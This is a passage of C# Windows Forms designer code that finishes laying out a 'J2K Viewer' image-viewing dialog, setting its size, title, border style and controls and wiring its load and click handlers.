     this.ER.Click += new System.EventHandler(this.ER_Click);
     //
     // J2KViewer
     //
     this.AutoScaleBaseSize = new System.Drawing.Size(5, 13);
     this.ClientSize        = new System.Drawing.Size(524, 373);
     this.Controls.Add(this.statusStrip1);
     this.Controls.Add(this.toolStrip1);
     this.Controls.Add(this.lblFileInfo);
     this.Controls.Add(this.pictureBox);
     this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedDialog;
     this.MaximizeBox     = false;
     this.Name            = "J2KViewer";
     this.StartPosition   = System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text            = "J2K Viewer";
     this.Load           += new System.EventHandler(this.J2KViewer_Load);
     ((System.ComponentModel.ISupportInitialize)(this.pictureBox)).EndInit();
     this.toolStrip1.ResumeLayout(false);
     this.toolStrip1.PerformLayout();
     this.statusStrip1.ResumeLayout(false);
     this.statusStrip1.PerformLayout();
     this.ResumeLayout(false);
     this.PerformLayout();
 }